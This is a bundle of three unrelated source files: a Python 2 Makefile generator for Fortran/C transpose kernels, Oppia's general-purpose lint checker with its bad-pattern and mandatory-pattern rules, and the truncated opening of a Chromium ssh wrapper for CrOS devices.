makefile.write('LD = $(FC) \n')
makefile.write('OMPFLAGS = -openmp \n')
makefile.write('CFLAGS = -std=c99 $(OMPFLAGS) \n')
makefile.write('FFLAGS = -assume nounderscore $(OMPFLAGS) \n')
if (Debug):
makefile.write('RFLAGS = -g -O0 \n')
makefile.write('OFLAGS = -g -O0 \n')
else:
makefile.write('RFLAGS = -O2 \n')
makefile.write('OFLAGS = -O3 -mavx \n')
flags = '-openmp -std=c99 -assume nounderscore -O3 -mavx'
makefile.write('LDFLAGS = $(FFLAGS) $(RFLAGS) -nofor-main \n')
makefile.write('SFLAGS = -fsource-asm -fverbose-asm -fcode-asm \n\n')
elif (Compiler=='XL' or Compiler=='BG-XL'):
if (Compiler=='XL'):
makefile.write('CC = xlc_r \n')
makefile.write('FC = xlf_r \n')
if (Compiler=='BG-XL'):
makefile.write('CC = bgxlc_r \n')
makefile.write('FC = bgxlf_r \n')
makefile.write('LD = $(FC) \n')
makefile.write('OMPFLAGS = -qsmp=omp \n')
makefile.write('CFLAGS = -qlanglvl=stdc99 $(OMPFLAGS) \n')
makefile.write('FFLAGS = $(OMPFLAGS) \n')
if (Debug):
makefile.write('RFLAGS = -g -O3 -qstrict \n')
makefile.write('OFLAGS = -g -O3 -qstrict \n')
else:
makefile.write('RFLAGS = -g -O3 -qstrict \n')
makefile.write('OFLAGS = -g -O3 -qhot -qsimd=auto \n')
flags = '-qsmp=omp -qlanglvl=stdc99 -g -O3 -qhot -qsimd=auto'
makefile.write('LDFLAGS = $(FFLAGS) $(RFLAGS) \n')
makefile.write('SFLAGS = -qlist -qlistopt -qreport -qsource \n\n')
elif (Compiler=='Cray'):
makefile.write('CC = craycc \n')
makefile.write('FC = crayftn \n')
makefile.write('LD = $(FC) \n')
makefile.write('OMPFLAGS = -h thread3 \n')
makefile.write('CFLAGS = -h c99 $(OMPFLAGS) \n')
makefile.write('FFLAGS = $(OMPFLAGS) \n')
if (Debug):
makefile.write('RFLAGS = -g -O0 \n')
makefile.write('OFLAGS = -g -O0 \n')
else:
makefile.write('RFLAGS = -O2 \n')
makefile.write('OFLAGS = -O3 \n')
flags = '-h thread3 -h c99 -O3'
makefile.write('LDFLAGS = $(FFLAGS) $(RFLAGS) \n')
makefile.write('SFLAGS = \n\n')
else:
print 'you must define Compiler'
exit()
makefile.write('\n\n')
makefile.write('SOURCES = \\\n')
for Language in ['f','c']:
for transpose_order in generate_permutation_list(Debug):
source_name = 'test_trans_'+perm_to_string(transpose_order)+'_'+Language
makefile.write(source_name+'.F \\\n')
for transpose_order in generate_permutation_list(Debug):
for loop_order in generate_permutation_list(Debug):
source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)+'_'+Language
makefile.write(source_name+'.f \\\n')
makefile.write('\n\n')
makefile.write('ROBJECTS = \\\n')
for Language in ['f','c']:
for transpose_order in generate_permutation_list(Debug):
source_name = 'test_trans_'+perm_to_string(transpose_order)+'_'+Language
makefile.write(source_name+'.o \\\n')
makefile.write('\n\n')
makefile.write('OBJECTS = \\\n')
for Language in ['f','c']:
for transpose_order in generate_permutation_list(Debug):
for loop_order in generate_permutation_list(Debug):
source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)+'_'+Language
makefile.write(source_name+'.o \\\n')
makefile.write('\n\n')
makefile.write('ASSEMBLY = \\\n')
for Language in ['f','c']:
for transpose_order in generate_permutation_list(Debug):
for loop_order in generate_permutation_list(Debug):
source_name = 'trans_'+perm_to_string(transpose_order)+'_loop_'+perm_to_string(loop_order)+'_'+Language
makefile.write(source_name+'.s \\\n')
for transpose_order in generate_permutation_list(Debug):
source_name = 'test_trans_'+perm_to_string(transpose_order)
makefile.write(source_name+'.s \\\n')
makefile.write('\n\n')
makefile.write('TESTOBJ = tester_cutil.o tester_futil.o old_sort.o \n\n')
makefile.write('all: test_trans_all.x \n\n')
makefile.write('%.x: %.o libtestutil.a libspaghetty.a \n')
makefile.write('\t$(LD) $(LDFLAGS) $< -L. -ltestutil -lspaghetty -o $@ \n\n')
makefile.write('libspaghetty.a: $(OBJECTS) \n')
makefile.write('\t$(AR) $(ARFLAGS) $@ $(OBJECTS) \n\n')
makefile.write('libtestutil.a: $(TESTOBJ) $(ROBJECTS) \n')
makefile.write('\t$(AR) $(ARFLAGS) $@ $(TESTOBJ) $(ROBJECTS) \n\n')
makefile.write('asm: $(ASSEMBLY) \n\n')
makefile.write('%.s: %.f \n')
makefile.write('\t$(FC) $(FFLAGS) $(OFLAGS) $(SFLAGS) -S $< -o $@ \n\n')
makefile.write('%.s: %.c \n')
makefile.write('\t$(CC) $(CFLAGS) $(OFLAGS) $(SFLAGS) -S $< -o $@ \n\n')
makefile.write('%.o: %.F \n')
makefile.write('\t$(FC) $(FFLAGS) $(RFLAGS) -c $< -o $@ \n\n')
makefile.write('%.o: %.f \n')
makefile.write('\t$(FC) $(FFLAGS) $(OFLAGS) -c $< -o $@ \n\n')
makefile.write('%.o: %.c \n')
makefile.write('\t$(CC) $(CFLAGS) $(OFLAGS) -c $< -o $@ \n\n')
makefile.write('clean: \n')
makefile.write('\t$(RM) $(RMFLAGS) test_trans_all.o $(OBJECTS) $(TESTOBJ) $(ASSEMBLY) \n\n')
makefile.write('realclean: clean \n')
makefile.write('\t$(RM) $(RMFLAGS) test_trans_all.x libspaghetty.a libtestutil.a \n\n')
makefile.write('srcclean: realclean \n')
makefile.write('\t$(RM) $(RMFLAGS) $(SOURCES) \n\n')
makefile.close()
generate_test_driver(Debug, Compiler, subdir, underscoring, rev, flags)
return
compilers = ['GNU','BGP-GNU','BGQ-GNU','Intel','XL','BG-XL','Cray','Mac','LLVM','BGQ-LLVM']
if len(sys.argv)>1:
Compiler = str(sys.argv[1])
if Compiler not in compilers:
print Compiler+' is not a valid compiler choice'
exit()
else:
print 'Please choose a compiler from GNU, BGP-GNU, BGQ-GNU, Intel, XL, BG-XL, Cray, Mac, LLVM, BGQ-LLVM'
exit()
if len(sys.argv)>2:
Debug = (str(sys.argv[2])=='Debug')
else:
Debug = False
if (Compiler in ['GNU','BGP-GNU','BGQ-GNU','Intel','XL','BG-XL','Mac','LLVM','BGQ-LLVM']):
underscoring=''
elif (Compiler in ['Cray']):
underscoring='_'
if Debug:
subdir = str(Compiler)+'-Debug'
else:
subdir = str(Compiler)
#rev = os.system('svn info generator2.py | grep Revision | sed "s/Revision: //g"')
#rev = subprocess.check_output('svn info generator2.py | grep Revision | sed "s/Revision: //g"')
#print 'rev = ',str(rev)
#exit()
rev = 242
os.system('mkdir '+subdir)
os.system('cp tester_cutil.c tester_futil.F old_sort.f '+subdir+'/.')
generate_all_subroutines(Debug, Compiler, subdir, underscoring)
generate_makefile(Debug, subdir, Compiler, rev)
| |
# coding: utf-8
#
# Copyright 2020 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Lint checks used by all the linters."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import os
import re
import python_utils
from . import js_ts_linter
from . import warranted_angular_security_bypasses
from .. import common
from .. import concurrent_task_utils
EXCLUDED_PATHS = (
'third_party/*', 'build/*', '.git/*', '*.pyc', 'CHANGELOG',
'integrations/*', 'integrations_dev/*', '*.svg', '*.gif', '*.png',
'*.webp', '*.zip', '*.ico', '*.jpg', '*.min.js', 'backend_prod_files/*',
'assets/scripts/*', 'core/domain/proto/*.py', 'core/tests/data/*',
'core/tests/build_sources/*', '*.mp3', '*.mp4', 'node_modules/*',
'typings/*', 'local_compiled_js/*', 'webpack_bundles/*',
'core/tests/services_sources/*', 'core/tests/release_sources/tmp_unzip.zip',
'scripts/linters/test_files/*',
'core/tests/release_sources/tmp_unzip.tar.gz',
'core/templates/combined-tests.spec.ts',
'core/templates/css/oppia-material.css',
'%s/*' % js_ts_linter.COMPILED_TYPESCRIPT_TMP_PATH)
GENERATED_FILE_PATHS = (
'extensions/interactions/LogicProof/static/js/generatedDefaultData.ts',
'extensions/interactions/LogicProof/static/js/generatedParser.ts',
'core/templates/expressions/parser.js')
CONFIG_FILE_PATHS = (
'core/tests/.browserstack.env.example',
'core/tests/protractor.conf.js',
'core/tests/karma.conf.ts',
'core/templates/mathjaxConfig.ts',
'assets/constants.ts',
'assets/rich_text_components_definitions.ts',
'webpack.config.ts',
'webpack.dev.config.ts',
'webpack.prod.config.ts')
REQUIRED_STRINGS_CONSTANTS = {
'DEV_MODE: true': {
'message': 'Please set the DEV_MODE variable in constants.ts'
'to true before committing.',
'excluded_files': ()
}
}
BAD_PATTERNS = {
'\t': {
'message': 'Please use spaces instead of tabs.',
'excluded_files': (),
'excluded_dirs': (
'assets/i18n/', 'core/tests/build_sources/assets/')},
'\r': {
'message': 'Please make sure all files only have LF endings (no CRLF).',
'excluded_files': (),
'excluded_dirs': ()},
'<<<<<<<': {
'message': 'Please fully resolve existing merge conflicts.',
'excluded_files': (),
'excluded_dirs': ()},
'>>>>>>>': {
'message': 'Please fully resolve existing merge conflicts.',
'excluded_files': (),
'excluded_dirs': ()},
'glyphicon': {
'message': 'Please use equivalent material-icons '
'instead of glyphicons.',
'excluded_files': (),
'excluded_dirs': ()}
}
BAD_PATTERNS_REGEXP = [
{
'regexp': re.compile(r'TODO[^\(]*[^\)][^:]*[^A-Z]+[^\w]*$'),
'message': 'Please assign TODO comments to a user '
'in the format TODO(username): XXX. ',
'excluded_files': (),
'excluded_dirs': ()
}
]
BAD_PATTERNS_JS_AND_TS_REGEXP = [
{
'regexp': re.compile(r'\b(browser.explore)\('),
'message': 'In tests, please do not use browser.explore().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(browser.pause)\('),
'message': 'In tests, please do not use browser.pause().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(browser.sleep)\('),
'message': 'In tests, please do not use browser.sleep().',
'excluded_files': (
# TODO(#7622): Remove the file from the excluded list. Remove the
# TODO in core/tests/protractor_desktop/embedding.js pointing to the
# same issue. The following was placed due to a necessary sleep as
# a temporary measure to keep the embedding tests from failing.
'core/tests/protractor_desktop/embedding.js',
),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(browser.waitForAngular)\('),
'message': 'In tests, please do not use browser.waitForAngular().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'bypass'),
'message': 'The use of the word "bypass" is not allowed, ' +
'particularly with regards to bypassSecurityTrustHTML() ' +
'and similar functions in Angular.',
'excluded_files': (
warranted_angular_security_bypasses
.EXCLUDED_BYPASS_SECURITY_TRUST_FILES),
'excluded_dirs': (
warranted_angular_security_bypasses
.EXCLUDED_BYPASS_SECURITY_TRUST_DIRECTORIES)
},
{
'regexp': re.compile(r'\b(ddescribe|fdescribe)\('),
'message': 'In tests, please use \'describe\' instead of \'ddescribe\''
'or \'fdescribe\'',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(iit|fit)\('),
'message': 'In tests, please use \'it\' instead of \'iit\' or \'fit\'',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(beforeEach\(inject\(function)\('),
'message': 'In tests, please use \'angular.mock.inject\' instead of '
'\'inject\'',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'templateUrl: \''),
'message': 'The directives must be directly referenced.',
'excluded_files': (
'core/templates/pages/exploration-player-page/'
'FeedbackPopupDirective.js',
'.component.ts'
),
'excluded_dirs': (
'extensions/answer_summarizers/',
'extensions/classifiers/',
'extensions/dependencies/',
'extensions/value_generators/',
'extensions/visualizations/')
},
{
'regexp': re.compile(r'toThrow[(]'),
'message': 'Please use \'toThrowError\' instead of '
'\'toThrow\'',
'excluded_files': (
# Note to developers: In the excluded_files below,
# we use custom errors which cannot be caught by regex.
# The Logic Proof interaction which uses these custom errors
# will be deprecated soon (see #9198).
'extensions/interactions/LogicProof/static/js/student.spec.ts',
'extensions/interactions/LogicProof/static/js/complete.spec.ts',
'extensions/interactions/LogicProof/static/js/teacher.spec.ts'),
'excluded_dirs': ()
},
{
'regexp': re.compile(
r'(?!catch\s(\n|.)*throw\s\w+;\n.*})'
r'throw\s\b(\bError|\bTypeError|\bRangeError'
r'\bSyntaxError|\bDimensionError)\('),
'message': 'Please use \'throw new\' instead of \'throw\'',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(
r'(?!catch\s(\n|.)*throw\s\w+;\n.*})throw\s\'.*\';'),
'message': 'Please use '
'\'throw new Error\' instead of \'throw\'',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\$parent'),
'message': 'Please do not access parent properties ' +
'using $parent. Use the scope object' +
'for this purpose.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'require\(.*\.\..*\);'),
'message': 'Please, don\'t use relative imports in require().',
'excluded_files': (),
'excluded_dirs': ('core/tests/',)
},
{
'regexp': re.compile(r'innerHTML'),
'message': 'Please do not use innerHTML property.',
'excluded_files': (
'core/templates/Polyfills.ts',
'core/templates/filters/translate.pipe.spec.ts',
'core/templates/components/ck-editor-helpers/' +
'ck-editor-copy-content-service.spec.ts',
'core/templates/tests/unit-test-utils.ts'),
'excluded_dirs': ('core/tests/',)
},
{
'regexp': re.compile(
r'eslint-(disable|enable)(-next-line)? camelcase'),
'message': (
'Please do not use eslint disable for camelcase. '
'If you are using this statement to define properties '
'in an interface for a backend dict. Wrap the property '
'name in single quotes instead.'),
'excluded_files': (
'typings/guppy-defs-b5055b963fdbea5c6c1e92dbf58fdaf3ea0cd8ba.d.ts',
'core/templates/services/UpgradedServices.ts'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'no-explicit-any'),
'message': (
'Please do not define "any" types. You can refer '
'https://github.com/oppia/oppia/wiki/Guide-on-defining-types '
'if you\'re having trouble declaring types.'),
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\$broadcast'),
'message': (
'Please do not use $broadcast/$on for propagating events. '
'Use @Input/@Output instead.'),
'excluded_files': (
'core/templates/pages/exploration-editor-page/translation-tab/'
'audio-translation-bar/audio-translation-bar.directive.spec.ts',
'core/templates/pages/library-page/search-bar/'
'search-bar.component.spec.ts'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'import \{.*\} from \'lodash\''),
'message': (
'Please do not use "import { someFunction } from \'lodash\'". '
'Use "import someFunction from \'lodash/someFunction\'" instead.'),
'excluded_files': (),
'excluded_dirs': ()
}
]
MANDATORY_PATTERNS_REGEXP = [
{
'regexp': re.compile(
r'Copyright \d{4} The Oppia Authors\. All Rights Reserved\.'),
'message': 'Please ensure this file should contain a proper '
'copyright notice.',
'included_types': ('.py', '.js', '.sh', '.ts'),
'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS + (
'__init__.py', ),
'excluded_dirs': EXCLUDED_PATHS
},
{
'regexp': re.compile('from __future__ import unicode_literals'),
'message': 'Please ensure this file should contain unicode_literals '
'future import.',
'included_types': ('.py'),
'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS + (
'__init__.py',),
'excluded_dirs': EXCLUDED_PATHS
}
]
MANDATORY_PATTERNS_JS_REGEXP = [
{
'regexp': re.compile(r'^\s\*\s@fileoverview\s[a-zA-Z0-9_]+'),
'message': 'Please ensure this file should contain a file '
'overview i.e. a short description of the file.',
'included_types': ('.js', '.ts'),
'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS,
'excluded_dirs': EXCLUDED_PATHS
}
]
BAD_LINE_PATTERNS_HTML_REGEXP = [
{
'regexp': re.compile(r'text\/ng-template'),
'message': 'The directives must be directly referenced.',
'excluded_files': (),
'excluded_dirs': (
'extensions/answer_summarizers/',
'extensions/classifiers/',
'extensions/objects/',
'extensions/value_generators/')
},
{
'regexp': re.compile(r'[ \t]+$'),
'message': 'There should not be any trailing whitespaces.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\$parent'),
'message': 'Please do not access parent properties ' +
'using $parent. Use the scope object ' +
'for this purpose.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\s+style\s*=\s*'),
'message': 'Please do not use inline styling.',
'excluded_files': (),
'excluded_dirs': ()
}
]
BAD_PATTERNS_PYTHON_REGEXP = [
{
'regexp': re.compile(r'__author__'),
'message': 'Please remove author tags from this file.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'datetime.datetime.now\(\)'),
'message': 'Please use datetime.datetime.utcnow() instead of '
'datetime.datetime.now().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wprint\('),
'message': 'Please do not use print statement.',
'excluded_files': (
'core/tests/test_utils.py',
'core/tests/performance_framework/perf_domain.py'),
'excluded_dirs': ('scripts/',)
},
{
'regexp': re.compile(r'\sprint\('),
'message': 'Please use python_utils.PRINT().',
'excluded_files': ('python_utils.py',),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'# pylint:\s*disable=[A-Z][0-9]{4}'),
'message': 'Please remove pylint exclusion if it is unnecessary, or '
'make it human readable with a sentence instead of an id. '
'The id-to-message list can be seen '
'here->http://pylint-messages.wikidot.com/all-codes',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'self.assertEquals\('),
'message': 'Please do not use self.assertEquals method. ' +
'This method has been deprecated. Instead use ' +
'self.assertEqual method.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'with open\(|= open\('),
'message': 'Please use python_utils.open_file() instead of open().',
'excluded_files': ('python_utils.py',),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'StringIO'),
'message': 'Please use python_utils.string_io() instead of ' +
'import StringIO.',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*quote\('),
'message': 'Please use python_utils.url_quote().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*unquote_plus\('),
'message': 'Please use python_utils.url_unquote_plus().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*urlencode\('),
'message': 'Please use python_utils.url_encode().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*urlretrieve\('),
'message': 'Please use python_utils.url_retrieve().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib(2)?\..*urlopen\('),
'message': 'Please use python_utils.url_open().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urlsplit'),
'message': 'Please use python_utils.url_split().',
'excluded_files': ('python_utils.py',),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urlparse'),
'message': 'Please use python_utils.url_parse().',
'excluded_files': ('python_utils.py',),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urlunsplit'),
'message': 'Please use python_utils.url_unsplit().',
'excluded_files': ('python_utils.py',),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'parse_qs'),
'message': 'Please use python_utils.parse_query_string().',
'excluded_files': ('python_utils.py',),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wunquote\('),
'message': 'Please use python_utils.urllib_unquote().',
'excluded_files': ('python_utils.py',),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urljoin'),
'message': 'Please use python_utils.url_join().',
'excluded_files': ('python_utils.py',),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib(2)?\..*Request\('),
'message': 'Please use python_utils.url_request().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'[^.|\w]input\('),
'message': 'Please use python_utils.INPUT.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'[^.|\w|\s]map\('),
'message': 'Please use python_utils.MAP.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wnext\('),
'message': 'Please use python_utils.NEXT.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'object\):'),
'message': 'Please use python_utils.OBJECT.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wrange\('),
'message': 'Please use python_utils.RANGE.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wround\('),
'message': 'Please use python_utils.ROUND.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wstr\('),
'message': (
'Please try to use python_utils.convert_to_bytes() for the strings '
'used in webapp2\'s built-in methods or for strings used directly '
'in NDB datastore models. If you need to cast ints/floats to '
'strings, please use python_utils.UNICODE() instead.'),
'excluded_files': ('python_utils.py',),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wzip\('),
'message': 'Please use python_utils.ZIP.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'basestring'),
'message': 'Please use python_utils.BASESTRING.',
'excluded_files': ('python_utils.py',),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'__metaclass__'),
'message': 'Please use python_utils.with_metaclass().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'iteritems'),
'message': 'Please use items() instead.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'itervalues'),
'message': 'Please use values() instead.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'iterkeys'),
'message': 'Please use keys() instead.',
'excluded_files': (),
'excluded_dirs': ()
}
]
BAD_PATTERNS_MAP = {
'.js': BAD_PATTERNS_JS_AND_TS_REGEXP,
'.ts': BAD_PATTERNS_JS_AND_TS_REGEXP,
'.html': BAD_LINE_PATTERNS_HTML_REGEXP,
'.py': BAD_PATTERNS_PYTHON_REGEXP
}
def is_filepath_excluded_for_bad_patterns_check(pattern, filepath):
"""Checks if file is excluded from the bad patterns check.
Args:
pattern: str. The pattern to be checked against.
filepath: str. Path of the file.
Returns:
bool. Whether to exclude the given file from this
particular pattern check.
"""
return (any(
filepath.startswith(bad_pattern)
for bad_pattern in BAD_PATTERNS[pattern]['excluded_dirs'])
or filepath in BAD_PATTERNS[pattern]['excluded_files'])
def check_bad_pattern_in_file(filepath, file_content, pattern):
"""Detects whether the given pattern is present in the file.
Args:
filepath: str. Path of the file.
file_content: str. Contents of the file.
pattern: dict. (regexp(regex pattern) : Object containing details for
the pattern to be checked. Pattern to match:
message: str. Message to show if pattern matches.
excluded_files: tuple(str). Files to be excluded from matching.
excluded_dirs: tuple(str). Directories to be excluded from
matching).
Returns:
tuple(bool, list(str)). A 2-tuple whose first element is a bool
which set to True if there is bad pattern found else False, whose second
element is a list of failed messages.
"""
error_messages = []
failed = False
regexp = pattern['regexp']
if not (any(
filepath.startswith(excluded_dir)
for excluded_dir in pattern['excluded_dirs'])
or any(
filepath.endswith(excluded_file)
for excluded_file in pattern['excluded_files'])):
bad_pattern_count = 0
for line_num, line in enumerate(file_content, 1):
if line.endswith('\n'):
stripped_line = line[:-1]
else:
stripped_line = line
if stripped_line.endswith('disable-bad-pattern-check'):
continue
if regexp.search(stripped_line):
error_message = ('%s --> Line %s: %s' % (
filepath, line_num, pattern['message']))
error_messages.append(error_message)
bad_pattern_count += 1
if bad_pattern_count:
failed = True
return failed, error_messages
return failed, error_messages
def check_file_type_specific_bad_pattern(filepath, content):
"""Check the file content based on the file's extension.
Args:
filepath: str. Path of the file.
content: str. Contents of the file.
Returns:
bool. True if there is bad pattern else false.
total_error_count: int. The number of errors.
"""
error_messages = []
failed = False
_, extension = os.path.splitext(filepath)
pattern = BAD_PATTERNS_MAP.get(extension)
total_error_count = 0
if pattern:
for regexp in pattern:
failed, error_message = check_bad_pattern_in_file(
filepath, content, regexp)
error_messages.extend(error_message)
if failed:
total_error_count += 1
if total_error_count:
failed = True
return failed, total_error_count, error_messages
class GeneralPurposeLinter(python_utils.OBJECT):
"""Manages all the common linting functions. As an abstract base class, this
is not intended to be used directly.
"""
def __init__(self, files_to_lint, file_cache):
"""Constructs a GeneralPurposeLinter object.
Args:
files_to_lint: list(str). A list of filepaths to lint.
file_cache: object(FileCache). Provides thread-safe access to cached
file content.
"""
# Set path for node.
# The path for node is set explicitly, since otherwise the lint
# tests fail on CircleCI due to the TypeScript files not being
# compilable.
os.environ['PATH'] = '%s/bin:' % common.NODE_PATH + os.environ['PATH']
self.files_to_lint = files_to_lint
self.file_cache = file_cache
@property
def all_filepaths(self):
"""Returns all file paths."""
return self.files_to_lint
def _check_for_mandatory_pattern_in_file(
self, pattern_list, filepath, failed):
"""Checks for a given mandatory pattern in a file.
Args:
pattern_list: list(dict). The list of the mandatory patterns list to
be checked for in the file.
filepath: str. The path to the file to be linted.
failed: bool. Status of failure of the check.
Returns:
bool. The failure status of the check.
"""
# This boolean list keeps track of the regex matches
# found in the file.
pattern_found_list = []
error_messages = []
file_content = self.file_cache.readlines(filepath)
for index, regexp_to_check in enumerate(
pattern_list):
if (any([filepath.endswith(
allowed_type) for allowed_type in (
regexp_to_check['included_types'])]) and (
not any([
filepath.endswith(
pattern) for pattern in (
regexp_to_check[
'excluded_files'] +
regexp_to_check[
'excluded_dirs'])]))):
pattern_found_list.append(index)
for line in file_content:
if regexp_to_check['regexp'].search(line):
pattern_found_list.pop()
break
if pattern_found_list:
failed = True
for pattern_found in pattern_found_list:
error_message = ('%s --> %s' % (
filepath,
pattern_list[pattern_found]['message']))
error_messages.append(error_message)
return failed, error_messages
def check_mandatory_patterns(self):
"""This function checks that all files contain the mandatory
patterns.
"""
name = 'Mandatory pattern'
error_messages = []
failed = False
sets_of_patterns_to_match = [
MANDATORY_PATTERNS_REGEXP, MANDATORY_PATTERNS_JS_REGEXP]
for filepath in self.all_filepaths:
for pattern_list in sets_of_patterns_to_match:
failed, mandatory_error_messages = (
self._check_for_mandatory_pattern_in_file(
pattern_list, filepath, failed))
error_messages.extend(mandatory_error_messages)
return concurrent_task_utils.TaskResult(
name, failed, error_messages, error_messages)
def check_bad_patterns(self):
"""This function is used for detecting bad patterns."""
name = 'Bad pattern'
total_files_checked = 0
total_error_count = 0
error_messages = []
all_filepaths = [
filepath for filepath in self.all_filepaths if not (
filepath.endswith('general_purpose_linter.py') or (
filepath.endswith('general_purpose_linter_test.py')))]
failed = False
for filepath in all_filepaths:
file_content = self.file_cache.readlines(filepath)
total_files_checked += 1
for pattern in BAD_PATTERNS:
if is_filepath_excluded_for_bad_patterns_check(
pattern, filepath):
continue
for line_num, line in enumerate(file_content):
if pattern in line:
failed = True
error_message = ('%s --> Line %s: %s' % (
filepath, line_num + 1,
BAD_PATTERNS[pattern]['message']))
error_messages.append(error_message)
total_error_count += 1
for regexp in BAD_PATTERNS_REGEXP:
bad_pattern_check_failed, bad_pattern_error_messages = (
check_bad_pattern_in_file(
filepath, file_content, regexp))
if bad_pattern_check_failed:
error_messages.extend(bad_pattern_error_messages)
total_error_count += 1
(
file_type_specific_bad_pattern_failed,
temp_count, bad_pattern_error_messages) = (
check_file_type_specific_bad_pattern(
filepath, file_content))
failed = (
failed or file_type_specific_bad_pattern_failed or
bad_pattern_check_failed)
total_error_count += temp_count
error_messages.extend(bad_pattern_error_messages)
if filepath == 'constants.ts':
for pattern in REQUIRED_STRINGS_CONSTANTS:
if pattern not in file_content:
failed = True
error_message = ('%s --> %s' % (
filepath,
REQUIRED_STRINGS_CONSTANTS[pattern]['message']))
error_messages.append(error_message)
total_error_count += 1
return concurrent_task_utils.TaskResult(
name, failed, error_messages, error_messages)
def check_newline_at_eof(self):
"""This function is used to detect newline at the end of file."""
name = 'Newline at EOF'
error_messages = []
files_to_lint = self.all_filepaths
failed = False
for filepath in files_to_lint:
file_content = self.file_cache.readlines(filepath)
file_length = len(file_content)
if (
file_length >= 1 and
not re.search(r'[^\n]\n', file_content[-1])):
error_message = (
'%s --> There should be a single newline at the '
'end of file.' % filepath)
error_messages.append(error_message)
failed = True
return concurrent_task_utils.TaskResult(
name, failed, error_messages, error_messages)
def perform_all_lint_checks(self):
"""Perform all the lint checks and returns the messages returned by all
the checks.
Returns:
list(TaskResult). A list of TaskResult objects representing the
results of the lint checks.
"""
if not self.all_filepaths:
return [
concurrent_task_utils.TaskResult(
'General purpose lint', False, [],
['There are no files to be checked.'])]
task_results = [
self.check_mandatory_patterns(), self.check_bad_patterns(),
self.check_newline_at_eof()]
return task_results
def get_linters(files_to_lint, file_cache):
"""Creates GeneralPurposeLinter object and returns it.
Args:
files_to_lint: list(str). A list of filepaths to lint.
file_cache: object(FileCache). Provides thread-safe access to cached
file content.
Returns:
tuple(GeneralPurposeLinter, None). A 2-tuple of custom and third_party
linter objects.
"""
custom_linter = GeneralPurposeLinter(files_to_lint, file_cache)
return custom_linter, None
| |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A wrapper around ssh for common operations on a CrOS-based device"""
import logging
import re
import os
import shutil
import stat
import subprocess
import tempfile
# Some developers' workflow includes running the Chrome process from
# /usr/local/... instead of the default location. We have to check for both
# paths in order to support this workflow.
